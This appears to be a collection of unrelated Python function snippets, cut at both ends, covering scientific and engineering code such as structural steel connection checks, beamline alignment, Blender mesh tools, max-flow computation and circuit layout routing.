\" %s \" % maxg_print,\n \"% 8.4f \" % sum(chain.calc_spacings()),\n )\n )\n\n GW = chain.get_global_grad(\"total\", \"working\")\n GP = chain.get_global_grad(\"total\", \"plain\")\n HW = chain.guess_hessian_working.copy()\n HP = chain.guess_hessian_plain.copy()\n dy, expect, expectG, ForceRebuild = chain.CalcInternalStep(trust, HW, HP)\n new_chain = chain.TakeStep(dy)\n respaced = new_chain.delete_insert(1.5)\n newcoords = chaintocoords(new_chain)\n attrs_new = check_attr(new_chain)\n attrs_prev = check_attr(chain)\n\n temp = {\"Ys\": [chain.get_internal_all().tolist()], \"GWs\": [GW.tolist()], \"GPs\": [GP.tolist()], \"attrs_new\": attrs_new,\n \"attrs_prev\": attrs_prev, \"trust\": trust, \"expect\": expect, \"expectG\": expectG.tolist(), \"respaced\": respaced,\n \"trustprint\": \"=\", \"frocerebuild\": False,\"lastforce\": 0, \"coord_ang_prev\": chaintocoords(chain, True),\n \"result_prev\": result, \"geometry\": []}\n info_dict.update(temp)\n return newcoords, info_dict", "def determine_doubler_plate(self, connection_type, steel, left_beam, right_beam, bottom_column, top_column):\r\n if connection_type == 'top exterior':\r\n # Connection has one left beam and one bottom column\r\n h_bot = bottom_column.unbraced_length['x']*12.0 # Be cautious: convert the unit from ft to inch\r\n db = left_beam.section['d']\r\n tf = left_beam.section['tf']\r\n self.shear_force['Vc'] = (self.moment['Mf1']+0) / (h_bot/2+0)\r\n self.shear_force['Ru'] = (self.moment['Mf1']+0)/(db-tf) - self.shear_force['Vc']\r\n elif connection_type == 'typical exterior':\r\n # Connection has one left beam and two columns\r\n 
h_bot = bottom_column.unbraced_length['x']*12.0 # Be cautious: convert the unit from ft to inch\r\n h_top = top_column.unbraced_length['x']*12.0 # Be cautious: convert the unit from ft to inch\r\n db = left_beam.section['d']\r\n tf = left_beam.section['tf']\r\n self.shear_force['Vc'] = (self.moment['Mf1']+0) / (h_bot/2+h_top/2)\r\n self.shear_force['Ru'] = (self.moment['Mf1']+0)/(db-tf) - self.shear_force['Vc']\r\n elif connection_type == 'top interior':\r\n # Connection has two beams and one bottom column\r\n h_bot = bottom_column.unbraced_length['x']*12.0 # Be cautious: convert the unit from ft to inch\r\n # Actually left and right beams have the identical sizes\r\n db = (left_beam.section['d'] + right_beam.section['d'])/2\r\n tf = (left_beam.section['tf'] + right_beam.section['tf'])/2\r\n self.shear_force['Vc'] = (self.moment['Mf1']+self.moment['Mf2']) / (h_bot/2)\r\n self.shear_force['Ru'] = (self.moment['Mf1']+self.moment['Mf2'])/(db-tf) - self.shear_force['Vc']\r\n elif connection_type == 'typical interior':\r\n # Connection has two beams and two columns\r\n h_bot = bottom_column.unbraced_length['x']*12.0 # Be cautious: convert the unit from ft to inch\r\n h_top = top_column.unbraced_length['x']*12.0 # Be cautious: convert the unit from ft to inch\r\n db = (left_beam.section['d'] + right_beam.section['d']) / 2\r\n tf = (left_beam.section['tf'] + right_beam.section['tf']) / 2\r\n self.shear_force['Vc'] = (self.moment['Mf1']+self.moment['Mf2']) / (h_bot/2+h_top/2)\r\n self.shear_force['Ru'] = (self.moment['Mf1']+self.moment['Mf2'])/(db-tf) - self.shear_force['Vc']\r\n else:\r\n sys.stderr.write('Error: wrong type of connection specified!\\nNo such keyword for connection exists!\\n')\r\n sys.exit(2)\r\n # Compute the shear strength of the panel zone\r\n phi = 1.0\r\n dc = bottom_column.section['d']\r\n tw = bottom_column.section['tw']\r\n bcf = bottom_column.section['bf']\r\n tcf = bottom_column.section['tf']\r\n db = left_beam.section['d']\r\n self.shear_force['Rn'] = 0.60 * steel.Fy * dc * tw * (1+(3*bcf*tcf**2)/(db*dc*tw))\r\n # Compute the doubler plate thickness\r\n if phi*self.shear_force['Rn'] >= self.shear_force['Ru']:\r\n # Panel zone shear strength is sufficient ==> no need for doubler plate\r\n self.doubler_plate_thickness = 0\r\n else:\r\n # Panel zone shear strength is not sufficient ==> need doubler plate\r\n required_tp = (self.shear_force['Ru'] - 0.60*steel.Fy*(3*bcf*tcf**2)/db) / (0.60*steel.Fy*dc)\r\n tp = 0.25 # Assumed doubler plate thickness\r\n while tp < required_tp:\r\n tp += 0.25 # Update the thickness at an increment of 0.25 until it reaches the requirement\r\n self.doubler_plate_thickness = tp", "def _grow_secondary(self, amt):\n self._resize_secondary(amt)", "def beam_align():\n\n # do nothing if there is a sample mounted to avoid collisions\n if smart_magnet.sample_detect.get() == 0:\n raise Exception(\"Sample mounted on gonio! Avoided collision\")\n\n # wait for attenuators to finish moving\n yield from bps.abs_set(mxatten, 0.002)\n yield from bps.sleep(5)\n\n # transition to BL and open shutter\n yield from bps.abs_set(gov_rbt, \"BL\", wait=True)\n yield from bps.mv(sht.r, 0)\n\n yield from bps.abs_set(rot_aligner.cam_hi.cam_mode, \"beam_align\")\n\n # which direction, x pos. pitch beam outboard (-), y pos. 
pitch beam up (+)\n scan_uid = yield from bp.count([rot_aligner.cam_hi], 1)\n centroid_x, centroid_y = (\n db[scan_uid].table()[rot_aligner.cam_hi.cv1.outputs.output1.name][1],\n db[scan_uid].table()[rot_aligner.cam_hi.cv1.outputs.output2.name][1],\n )\n\n if np.isclose(0, centroid_x) or np.isclose(0, centroid_y):\n raise Exception(\"No centroid detected!\")\n\n yield from bps.abs_set(kbt.hor.delta_px, (centroid_x - 320))\n yield from bps.abs_set(kbt.ver.delta_px, -(centroid_y - 256))\n\n def lin_reg(independent, dependent, goal, **kwargs) -> float:\n b = dependent\n A = np.matrix([[pos, 1] for pos in independent])\n p = (\n np.linalg.inv(A.transpose() * A)\n * A.transpose()\n * np.matrix(b.to_numpy()).transpose()\n )\n best = (goal - p[1]) / p[0]\n return best\n\n for axis, signal, center in (\n kbt.hor,\n rot_aligner.cam_hi.cv1.outputs.output1,\n 320,\n ), (kbt.ver, rot_aligner.cam_hi.cv1.outputs.output2, 256):\n # skip if we are within 1 um\n if abs(axis.delta_px.get()) > 2:\n scan_uid = yield from rel_scan_no_reset(\n [rot_aligner.cam_hi],\n axis,\n 0,\n 0.4 * -(axis.delta_px.get() / abs(axis.delta_px.get())),\n 10,\n )\n scan_df = db[scan_uid].table()\n best_voltage = lin_reg(\n scan_df[axis.readback.name],\n scan_df[signal.name],\n center,\n )\n yield from bps.mv(axis, best_voltage)\n yield from bps.sleep(1)\n\n # close shutters and reset attenuators for manual viewing\n yield from bps.mv(sht.r, 20)", "def edbl():\n bpy.ops.transform.edge_slide(value=self.btr, mirror=False, correct_uv=False)\n bpy.ops.mesh.bevel(offset=self.bofs/2 , segments=self.bss+1 , vertex_only=False)\n bpy.ops.mesh.select_less()\n bpy.ops.transform.shrink_fatten(value=(self.bts * -1) if self.dms == 1 else self.bts, use_even_offset=self.bev)\n bpy.ops.mesh.remove_doubles(threshold=self.brd)\n if self.brx == True:\n try:\n bpy.ops.mesh.looptools_relax(input='selected', interpolation='linear', iterations='3', regular=False)\n except AttributeError:\n self.report({'ERROR'},\"I'm sorry the addon 'Looptools' is not active or not installed.\")\n if self.dsp == 1:\n bpy.ops.mesh.bevel(offset=0.1, segments=2, vertex_only=False)\n bpy.ops.mesh.select_less()\n bpy.ops.transform.shrink_fatten(value=0.2, use_even_offset=False, mirror=False, proportional='CONNECTED',\n proportional_edit_falloff='SMOOTH', proportional_size=0.0839017)", "def sub_link_capacity(self, path, bw):\n \n # PART 1, TASK 3.4 sub bw to edges", "def fix_bone_lengths(self, b_armature_data):\n for b_edit_bone in b_armature_data.edit_bones:\n #don't change root bones\n if b_edit_bone.parent:\n # take the desired length from the mean of all children's heads\n if b_edit_bone.children:\n childheads = mathutils.Vector()\n for b_child in b_edit_bone.children:\n childheads += b_child.head\n bone_length = (b_edit_bone.head - childheads/len(b_edit_bone.children)).length\n if bone_length < 0.01:\n bone_length = 0.25\n # end of a chain\n else:\n bone_length = b_edit_bone.parent.length\n b_edit_bone.length = bone_length", "def make_shaped_repertoire(RNs):\n # get objective distribution\n bin_edges, obj_dist, volume = objective_distribution()\n # get an antigenic epitope sequence, and in case of nkey=1,2 check whether\n # it can populate all required bins, thus avoiding infinite loop below\n AgEpitope = get_AgEpitope(RNs)\n if cf.nkey == 1 or cf.nkey == 2:\n while 1:\n # get list of all possible binding partners and their energies\n all_partners = get_all_partners()\n all_energies = [E_best(partner, AgEpitope)\n for partner in all_partners]\n # check whether all bins 
are occupiable with these energies,\n # if not, get new epitope sequence\n indices = np.digitize(all_energies, bin_edges, right=True)\n ind_set = set(indices)\n ind_set.discard(0)\n # if all bins can be occupied, move on\n if ind_set == set(range(1, len(bin_edges))):\n break\n # else get a new epitope and check its validity\n else:\n AgEpitope = get_AgEpitope(RNs)\n # initialise empty list for counting how many seqs have been found per bin\n ist_dist = np.zeros(len(obj_dist))\n # seq_list for collecting identified sequences\n seq_list = []\n E_list = []\n # while ist_dist and obj_dist are not equal, get new sequences and position\n # them if they are useful\n # introduce a tolerance of how far bins are allowed to deviate from the\n # goal, as otherwise runtime explodes due to very long waiting times for\n # high binding energy codes in large nkey cases - allow an absolute\n # deviation of volume*tolerance % for each bin.\n abs_tol = volume * 0.005\n while np.sum(np.abs((ist_dist-obj_dist)) > abs_tol) > 0:\n ab = Ab_seq(RNs)\n Emax = E_best(ab, AgEpitope)\n # find index bin of this energy\n indx = np.digitize(Emax, bin_edges, right=True)\n # if the index is in the useful range and the bin is not yet full,\n # count the sequence and store it\n if indx in range(1, len(bin_edges)):\n if obj_dist[indx-1] - ist_dist[indx-1] > 0:\n ist_dist[indx-1] += 1\n seq_list.append(ab)\n E_list.append(Emax)\n\n return seq_list, E_list, AgEpitope", "def __init__(\n self, model_path, n_substeps, gripper_extra_height, block_gripper,\n has_object, target_in_the_air, target_offset, obj_range, target_range,\n distance_threshold, initial_qpos, reward_type, goal_high_prob,\n min_goal_extra_height=0.0, max_goal_extra_height=0.45,\n min_dist_between_objs=0.1, same_color_radius=0.5,\n terminate_on_success=False\n ):\n self.gripper_extra_height = gripper_extra_height\n self.block_gripper = block_gripper\n self.has_object = has_object\n self.target_in_the_air = target_in_the_air\n self.target_offset = target_offset\n self.obj_range = obj_range\n self.target_range = target_range\n self.distance_threshold = distance_threshold\n self.reward_type = reward_type\n self.goal_high_prob = goal_high_prob\n self.min_goal_extra_height = min_goal_extra_height\n self.max_goal_extra_height = max_goal_extra_height\n self.min_dist_between_objs = min_dist_between_objs\n self.same_color_radius = same_color_radius\n\n few_shot_robot_env.FewShotRobotEnv.__init__(\n self, model_path=model_path, n_substeps=n_substeps, n_actions=4,\n initial_qpos=initial_qpos, terminate_on_success=terminate_on_success\n )", "def oss_stacked(block, cut, laser):\r\n\tx0_1, x1_1, z0_1, taper_x_1, taper_y_1, layers_1, pyramid_angle_1 = oss_helper(block, cut, laser, cut[\"final_dimension_x\"]/2)\r\n\tx0_2, x1_2, z0_2, taper_x_2, taper_y_2, layers_2, pyramid_angle_2 = oss_helper(block, cut, laser, cut[\"final_dimension_y\"]/2)\r\n\tangle = math.radians(laser[\"kerf_angle\"]/2)\r\n\tgap = math.tan(pyramid_angle_1) * (cut[\"final_dimension_x\"]/2) + cut[\"gap_size\"]\r\n\tunit_length = gap + cut[\"base_height\"]\r\n\tmax_slices = math.floor(block[\"thickness\"]/unit_length)\r\n\ttaper_straight = math.tan(angle)*(laser[\"z_spacing\"])\r\n\r\n\tif cut[\"core\"] == \"yes\":\r\n\t\tcutlist = json.loads(vertical_core(block,cut,laser))\r\n\t\tcutlist.pop()\r\n\t\tcutlist.pop(0)\r\n\telse:\r\n\t\tcutlist = []\r\n\r\n\ta0 = -(90 + math.degrees(angle))\r\n\r\n\tz_shift = (cut[\"base_height\"] + gap) * math.sin(angle)\r\n\tx_shift = (cut[\"base_height\"] + gap) * 
math.cos(angle)\r\n\r\n\tx_delta = math.sin(angle) * block[\"origin_x\"]\r\n\ty_delta = math.sin(angle) * block[\"origin_y\"]\r\n\tz1_delta = math.cos(angle) * block[\"origin_x\"]\r\n\tz2_delta = math.cos(angle) * block[\"origin_y\"]\r\n\r\n\tcutlist.append([\"a_abs\",f\"{a0:.6f}\"])\r\n\tcutlist.append([\"c_abs\",str(block[\"physical_rotation\"])])\r\n\tcutlist.append([\"z_abs\",str(z0_1 + z2_delta)])\r\n\r\n\tif pyramid_angle_1 >= angle and pyramid_angle_2 >= angle:\r\n\r\n\t\tif cut[\"num_of_seeds\"] == \"max\":\r\n\t\t\tnum_slices = max_slices\r\n\t\telse:\r\n\t\t\tnum_slices = cut[\"num_of_seeds\"] + 1\r\n\t\t\r\n\t\tfor i in range(num_slices):\r\n\t\t\tcutlist = (cutlist\r\n\t\t\t\t\t\t + pyramid_slice(cut[\"final_dimension_y\"]/2 - block[\"origin_x\"],x0_1 + y_delta,-cut[\"final_dimension_y\"]/2 - block[\"origin_x\"],x1_1 + y_delta,z0_1 + block[\"origin_y\"],laser[\"xy_spacing\"], laser[\"z_spacing\"], taper_x_1,taper_y_1,taper_straight,layers_1)\r\n\t\t\t\t\t\t + [[\"z_abs\",str(z0_2 + z1_delta)]] + [[\"c_abs\",\"90\"]]\r\n\t\t\t\t\t\t + pyramid_slice(cut[\"final_dimension_x\"]/2 + block[\"origin_y\"],x0_2 + x_delta,-cut[\"final_dimension_x\"]/2 + block[\"origin_y\"],x1_2 + x_delta,z0_2 + block[\"origin_x\"],laser[\"xy_spacing\"], laser[\"z_spacing\"], taper_x_2,taper_y_2,taper_straight,layers_2)\r\n\t\t\t\t\t\t + [[\"z_abs\",str(z0_1 - z2_delta)]] + [[\"c_abs\",\"180\"]]\r\n\t\t\t\t\t\t + pyramid_slice(cut[\"final_dimension_y\"]/2 + block[\"origin_x\"],x0_1 - y_delta,-cut[\"final_dimension_y\"]/2 + block[\"origin_x\"],x1_1 - y_delta,z0_1 - block[\"origin_y\"],laser[\"xy_spacing\"], laser[\"z_spacing\"], taper_x_1,taper_y_1,taper_straight,layers_1)\r\n\t\t\t\t\t\t + [[\"z_abs\",str(z0_2 - z1_delta)]] + [[\"c_abs\",\"270\"]]\r\n\t\t\t\t\t\t + pyramid_slice(cut[\"final_dimension_x\"]/2 - block[\"origin_y\"],x0_2 - x_delta,-cut[\"final_dimension_x\"]/2 - block[\"origin_y\"],x1_2 - x_delta,z0_2 - block[\"origin_x\"],laser[\"xy_spacing\"], laser[\"z_spacing\"], taper_x_2,taper_y_2,taper_straight,layers_2)\r\n\t\t\t\t\t\t )\r\n\t\t\tz0_1 = z0_1 + z_shift\r\n\t\t\tz0_2 = z0_2 + z_shift\r\n\t\t\tx0_1, x1_1, x0_2, x1_2 = x0_1 - x_shift, x1_1 - x_shift, x0_2 - x_shift, x1_2 - x_shift\r\n\t\t\tcutlist.append([\"c_abs\",str(block[\"physical_rotation\"])])\r\n\t\t\tcutlist.append([\"z_abs\",str(z0_1 + z2_delta)])\t\r\n\telse:\r\n\t\traise Exception(\"Pyramid angle too small\")\r\n\r\n\tcutlist.insert(0, [\"set_trigger4\", \"1\", \"0\", \"7\", \"8\", \"45\"])\r\n\tcutlist.append([\"stop_trigger\"])\r\n\treturn json.dumps(cutlist)", "def BrockBird_scaling(fluid,network,propname,sigma_o,To,**params):\n Tc = fluid.get_pore_data(prop='Tc')\n Ti = network.get_pore_data(phase=fluid,prop='temperature')\n Tro = To/Tc\n Tri = Ti/Tc\n value = sigma_o*(1-Tri)**(11/9)/(1-Tro)**(11/9)\n network.set_pore_data(phase=fluid,prop=propname,data=value)", "def __init__(self, connection_type, steel, beam_dead_load, beam_live_load, span,\r\n left_beam=None, right_beam=None, top_column=None, bottom_column=None):\r\n self.connection_type = connection_type\r\n # The dictionary used to store the RBS dimensions\r\n self.left_RBS_dimension = {}\r\n self.right_RBS_dimension = {}\r\n # The dictionary used to store the probable moment\r\n self.moment = {}\r\n # The dictionary used to store the shear force\r\n self.shear_force = {} # keys:\r\n # A scalar used to denote the doubler plate thickness\r\n self.doubler_plate_thickness = 0\r\n # A dictionary used to store the failure mode (if any)\r\n self.is_feasible = {} # keys: 
'geometry limit', 'flexural strength', 'shear strength', 'SCWB'\r\n # Define a boolean flag which denotes the overall check results (True means OK.)\r\n self.flag = None\r\n\r\n # Call methods to initialize the attributes listed above\r\n self.check_column_beam(connection_type, left_beam, right_beam, top_column, bottom_column)\r\n self.extract_reduced_beam_section(connection_type, left_beam, right_beam)\r\n self.compute_probable_moment_RBS(connection_type, steel, left_beam, right_beam)\r\n self.compute_shear_force_RBS(connection_type, beam_dead_load, beam_live_load, span, bottom_column)\r\n self.compute_probable_moment_column_face(connection_type)\r\n self.compute_plastic_moment(connection_type, steel, left_beam, right_beam)\r\n self.check_moment_column_face(connection_type)\r\n self.check_shear_strength(connection_type, beam_dead_load, beam_live_load, left_beam, right_beam)\r\n self.check_column_beam_relationships(connection_type, steel, left_beam, right_beam, top_column, bottom_column)\r\n self.determine_doubler_plate(connection_type, steel, left_beam, right_beam, bottom_column, top_column)", "def rigid_rings(self):\n raise NotImplementedError", "def update_flow(self):\n start_nodes = []\n end_nodes = []\n capacities = []\n # (1): add all edges (u, v) with capacity ub-lb\n B = self.get_max_lb()*(self.num_edges() - len(self) + 2)\n for arc in self.arc_info.keys():\n if self.arc_info[arc][\"upper_bound\"] == float('inf'):\n self.arc_info[arc][\"upper_bound\"] = B\n for arc in self.arc_info.keys():\n start_nodes.append(self.arc_info[arc][\"start\"])\n end_nodes.append(self.arc_info[arc][\"destin\"])\n capacities.append(int(self.arc_info[arc][\"upper_bound\"]\\\n - self.arc_info[arc][\"lower_bound\"]))\n # (2): add edge (t, s) with capacity B\n # B = max_lb * (m - n + 2)\n B = self.get_max_lb()*(self.num_edges() - len(self) + 2)\n if B == 0:\n #B = float('inf')\n B = 100000\n start_nodes.append(self.sink())\n end_nodes.append(self.source())\n capacities.append(int(B))\n # (3): for all verts, if exc > 0, add edge (s', v) with capacity exc(v),\n # and if exc < 0, add edge(s', v) with capacity -exc(v)\n s_prime = max(self.vertices) + 1\n t_prime = max(self.vertices) + 2\n print(\"s'={}, t'={}\".format(s_prime, t_prime))\n for v in self:\n #print(\"vert {} in arcs: {}\".format(v,\n # self.in_arcs_lists[v]))\n # compute exc: lower bounds of in - lower bounds of out\n sum_lb_in = 0\n for in_arc in self.in_arcs_lists[v]:\n sum_lb_in += self.arc_info[in_arc][\"lower_bound\"]\n sum_lb_out = 0\n #print(\"vert {} out arcs: {}\".format(v,\n # self.out_arcs_lists[v]))\n for out_arc in self.out_arcs_lists[v]:\n sum_lb_out += self.arc_info[out_arc][\"lower_bound\"]\n exc = sum_lb_in - sum_lb_out\n #print(\"exc is {}\".format(exc))\n if exc > 0:\n start_nodes.append(s_prime)\n end_nodes.append(v)\n capacities.append(int(exc))\n else:\n start_nodes.append(v)\n end_nodes.append(t_prime)\n capacities.append(int(-exc))\n # solve maxflow\n #print(\"s' is {} and t' is {}\".format(s_prime, t_prime))\n max_flow = pywrapgraph.SimpleMaxFlow()\n for u, v, cap in zip(start_nodes, end_nodes, capacities):\n #print(\"Adding edge {}, {} with cap {}\".format(u,v,cap))\n max_flow.AddArcWithCapacity(u, v, cap)\n success = True\n if max_flow.Solve(s_prime, t_prime) == max_flow.OPTIMAL:\n #print('Max flow: {}'.format( max_flow.OptimalFlow()))\n #print(' Arc Flow / Capacity')\n for i in range(max_flow.NumArcs()):\n # print('%1s -> %1s %3s / %3s' % (\n # max_flow.Tail(i),\n # max_flow.Head(i),\n # max_flow.Flow(i),\n # 
max_flow.Capacity(i)))\n # check that (s', v) edges are saturated (once we find a false,\n # stay false forever)\n if success:\n if max_flow.Tail(i) == s_prime:\n success = max_flow.Flow(i) == max_flow.Capacity(i)\n else:\n success = False\n print('There was an issue with the max flow input.')\n if success:\n # update the flows to be the flow found from maxflow problem\n for i in range(max_flow.NumArcs()):\n # if this is an original arc, update the flow\n if max_flow.Tail(i) != s_prime \\\n and max_flow.Head(i) != t_prime \\\n and not (max_flow.Tail(i) == self.sink() \\\n and max_flow.Head(i) == self.source()):\n # update arc\n start = max_flow.Tail(i)\n destin = max_flow.Head(i)\n arc = self.get_arc(start, destin)\n new_flow = self.arc_info[arc][\"lower_bound\"] + max_flow.Flow(i)\n old_flow = self.arc_info[arc][\"weight\"]\n self.arc_info[arc][\"weight\"] = new_flow\n #print(\"Edge {} {} adjusted from {} to {}\".format(\n # start,\n # destin,\n # old_flow,\n # new_flow\n # ))\n self.check_conservation_of_flow() # check that solution is valid\n return True\n else:\n return False", "def pad(self):\n if self._mg_problem.boundaries[0] == 'periodic':\n # left side\n self.left[:] = self.mid[-self.borders[0]:]\n # right side\n self.right[:] = self.mid[:self.borders[1]]\n elif self._mg_problem.boundaries[0] == 'dirichlet':\n\n # left from border\n l_f_b = self.space_tensor[0:self.borders[0]]\n # right_from_border\n r_f_b = self.space_tensor[-self.borders[1]:]\n # left side\n self.left[:] = self.fl(l_f_b)\n # right side\n self.right[:] = self.fr(r_f_b)", "def add_link_capacity(self, path, bw):\n\n # PART 1, TASK 3.4 add bw to edges", "def initOpt(self):\n\t\tself.optNodes=[]\n\t\tself.optNode=-1\n\t\tif self.m.headType=='Bracke':\n\t\t\tbracke=True #one head per decice\n\t\telse:\n\t\t\tbracke=False\n\t\tif '2a' in self.m.type:\n\t\t\t#this is strictly for 2000 plants/ha, i.e 10 spots per half circle and [4,9]m crane dimensions\n\t\t\tw1 = 1.3\n\t\t\tw2 = 1.0\n\t\t\tif self.mountPoint is 'left':\n\t\t\t\tfor r in [self.m.craneMaxL-w2, self.m.craneMinL+w2]:\n\t\t\t\t\tth=pi-asin(w1/r)\n\t\t\t\t\tself.optNodes.append(self.m.getCartesian([r,th]))\n\t\t\t\t\tself.idealSpots.append(self.m.getCartesian([r,th]))\n\t\t\t\tdth=(pi-2*asin(w1/r))/3.\n\t\t\t\tth-=dth\n\t\t\t\tself.optNodes.append(self.m.getCartesian([r,th]))\n\t\t\t\tself.idealSpots.append(self.m.getCartesian([r,th]))\n\t\t\t\tr=self.m.craneMaxL-w2\n\t\t\t\tth=pi-asin(w1/r)\n\t\t\t\tdth=(pi-asin(w1/r))/5. #outer\t\t\t\n\t\t\t\tth-=3*dth\n\t\t\t\tfor th in [th, th-dth]:\n\t\t\t\t\tself.optNodes.append(self.m.getCartesian([r,th]))\n\t\t\t\t\tself.idealSpots.append(self.m.getCartesian([r,th]))\n\t\t\telse:\n\t\t\t\tr=self.m.craneMaxL-w2\n\t\t\t\tth=pi-asin(w1/r)\n\t\t\t\tdth=(pi-asin(w1/r))/5. 
#outer\n\t\t\t\tth-=dth\n\t\t\t\tfor th in [th, th-dth]:\n\t\t\t\t\tself.optNodes.append(self.m.getCartesian([r,th]))\n\t\t\t\t\tself.idealSpots.append(self.m.getCartesian([r,th]))\n\t\t\t\tr=self.m.craneMinL+w2\n\t\t\t\tdth=(pi-2*asin(w1/r))/3.\n\t\t\t\tth=pi-asin(w1/r)-2.*dth\n\t\t\t\tfor th in [th, th-dth]:\n\t\t\t\t\tself.optNodes.append(self.m.getCartesian([r,th]))\n\t\t\t\t\tself.idealSpots.append(self.m.getCartesian([r,th]))\n\t\t\t\tr=self.m.craneMaxL-w2\n\t\t\t\tth=asin(w1/r)\n\t\t\t\tself.optNodes.append(self.m.getCartesian([r,th]))\n\t\t\t\tself.idealSpots.append(self.m.getCartesian([r,th]))\n\t\telse:\n\t\t\tassert len(self.m.pDevs)==0 or len(self.m.pDevs)==1 and self.m.pDevs[0]==self\n\t\t\tw1 = self.plantAreaW/2.\n\t\t\tw2 = self.plantAreaL/2.\n\t\t\tif bracke:\n\t\t\t\tspaceMin=self.m.plantMinDist\n\t\t\telse:\n\t\t\t\tspaceMin=self.plantAreaW-self.plantHeads[0].width+self.m.plantMinDist #minimum spacing for angular movements.\n\t\t\tn=ceil(self.m.nSeedlingsPWArea/len(self.plantHeads)) #due to several plantHeads per device\n\t\t\tnLeft=n\n\t\t\tlInner = (self.m.craneMinL+w2)*(pi-2*asin(w1/(self.m.craneMinL+w2)))\n\t\t\tsLength = sqrt(pow(self.m.craneMaxL-w2,2)-pow(w1,2))-sqrt(pow(self.m.craneMinL+w2,2)-pow(w1,2))\n\t\t\tlOuter =(self.m.craneMaxL-w2)*(pi-2*asin(w1/(self.m.craneMaxL-w2)))\n\t\t\tlMiddle=0\n\t\t\trList=[self.m.craneMinL+w2, 'border', self.m.craneMaxL-w2]\n\t\t\tlTot=lInner+sLength+lOuter\n\t\t\trMiddle=-1\n\t\t\tdr=self.m.craneMaxL-w2-(self.m.craneMinL+w2)\n\t\t\tif dr>2*self.m.plantMinDist: #create another sweep\n\t\t\t\trMiddle=(self.m.craneMaxL-w2)-dr/2.\n\t\t\t\tlMiddle=rMiddle*(pi-2*asin(w1/rMiddle))\n\t\t\t\trList.append(rMiddle)\n\t\t\t\tlTot+=lMiddle\n\t\t\tlCurr=0\n\t\t\tfor r in rList:\n\t\t\t\tif r is 'border':\n\t\t\t\t\tr=self.m.craneMinL+w2\n\t\t\t\t\tL=sLength\n\t\t\t\t\tnSection=nLeft*(L/(lTot-lCurr))\n\t\t\t\t\t#dr=(L-2*dr)/nSection =>\n\t\t\t\t\tdr=L/(nSection+2.)\n\t\t\t\t\tif dr<self.m.plantMinDist: dr=self.m.plantMinDist\n\t\t\t\t\ta=0\n\t\t\t\t\twhile r<(self.m.craneMaxL-w2)-2*dr:\n\t\t\t\t\t\tr+=dr\n\t\t\t\t\t\tth=asin(w1/(r))\n\t\t\t\t\t\tself.optNodes.append(self.m.getCartesian([r,th]))\n\t\t\t\t\t\tself.idealSpots.append(self.m.getCartesian([r,th]))\n\t\t\t\t\t\ta+=1\n\t\t\t\telse:\n\t\t\t\t\tL=r*(pi-2*asin(w1/r))\n\t\t\t\t\tnSection=nLeft*(L/(lTot-lCurr)) #how much to plant on this section\n\t\t\t\t\tdth=(pi-2*asin(w1/r))/nSection\n\t\t\t\t\tif dth*r < spaceMin: dth=spaceMin/r\n\t\t\t\t\tif r == self.m.craneMinL+w2 or r==rMiddle:\n\t\t\t\t\t\tdth=-dth\n\t\t\t\t\t\tth=pi-asin(w1/(r))\n\t\t\t\t\telse:\n\t\t\t\t\t\tth=asin(w1/(r))\n\t\t\t\t\ta=0\n\t\t\t\t\twhile abs(th-pi/2.)-0.00001<=(pi-2*asin(w1/r))/2.:\n\t\t\t\t\t\tself.optNodes.append(self.m.getCartesian([r,th]))\n\t\t\t\t\t\tself.idealSpots.append(self.m.getCartesian([r,th]))\n\t\t\t\t\t\tth+=dth\n\t\t\t\t\t\ta+=1\n\t\t\t\tif a<nSection: #if spaceMin got into it and interfered.\n\t\t\t\t\tnSection=a\n\t\t\t\tnLeft-=nSection\n\t\t\t\tlCurr+=L", "def _shrink_secondary(self, amt):\n self._resize_secondary(-amt)", "def make_bwfull(w,minZ,maxZ,ires=1,fixw=False,m=mz0):\n cmds = []\n # coefficients for the amplitudes\n cmds.append(\"A[1,0,1000000]\")\n cmds.append(\"B[1,0,1000000]\")\n cmds.append(\"C[10000.0,0,1000000]\")\n # amplitudes\n cmds.append('m[%s,%s,%s]'%(m,minZ,maxZ))\n cmds.append('g[2.49,0,10]')\n denom = '((x^2-m^2)^2+x^4*g^2/m^2)'\n cmds.append(\"expr::z_rbw('x^2/%s',x,m,g)\"%denom)\n cmds.append(\"expr::z_int('(x^2-m^2)/%s',x,m,g)\"%denom)\n 
cmds.append(\"expr::z_rad('1/(x^2)',x)\")\n # resolution model\n cmds += resolutions[ires]()\n [w.factory(cmd) for cmd in cmds]\n # any parameter adjustments\n if True:\n w.var('r_m').setConstant(kTRUE) if w.var('r_m') else None\n w.var('rt_m').setConstant(kTRUE) if w.var('rt_m') else None\n w.var('g').setConstant(kTRUE) if w.var('g') and fixw else None\n # sum-of-amplitudes pdf\n lshape = RooRealSumPdf('lshape','lshape',RooArgList(w.function('z_rad'),w.function('z_int'),w.function('z_rbw')),RooArgList(w.var('A'),w.var('B'),w.var('C')))\n getattr(w,'import')(lshape)\n # convolution\n pdf = w.pdf('lshape')\n if w.pdf('res'):\n w.var('x').setBins(10000,'cache')\n cmd = 'FCONV::sum(x,lshape,res)'\n w.factory(cmd)\n pdf = w.pdf('sum')\n return pdf, kFALSE", "def __init__(self, length=None, width=None, height=None, material=None, adhesion_material=None,\n dielectric_coating=None):\n self.length = length\n self.linspace_x = np.linspace(-length/2, length/2, num=100)\n self.width = width\n self.height = height\n self.material = material\n\n if self.material.thickness:\n if self.material.thickness != self.height:\n raise ValueError(\"BPE height must equal BPE material thickness\")\n\n # adhesion layer used for thin metal film BPE\n self.adhesion_material = adhesion_material\n\n # dielectric coating on top of BPE\n if dielectric_coating:\n self.dielectric_coating = dielectric_coating\n else:\n self.dielectric_coating = material_solid(name='no_dielectric', permittivity=1, thickness=1e-12, Ka=6, Kb=2, reaction_site_density=5)", "def __init__(self, kBoundedRing):\n KBoundedQuotientBasis.__init__(self, kBoundedRing, 'HLP')\n\n Sym = kBoundedRing.ambient()\n Sym.hall_littlewood(kBoundedRing.t).P().module_morphism(self.retract,codomain=self).register_as_coercion() # morphism from HLP to k-bounded HLP\n km = kBoundedRing.km()\n self.module_morphism(self._HLP_to_mk_on_basis, codomain=km, triangular='lower', unitriangular=True).register_as_coercion() # morphism from k-bounded-HLP to k-bounded-m\n km.module_morphism(self._m_to_kHLP_on_basis, codomain=self, triangular='lower', unitriangular=True).register_as_coercion() # morphism from k-bounded-m to k-bounded-HLP", "def route_input_B(self):\n xoffset = self.pmos.poly_positions[0].x \\\n + self.pmos_position2.x\n yoffset = self.A_position.y \\\n + max(drc[\"minwidth_metal2\"], self.poly_contact.second_layer_width) + drc[\"metal2_to_metal2\"]\n self.B_position = vector(xoffset, yoffset)\n offset = self.B_position - vector(0, 0.5 * self.poly_contact.width) \n 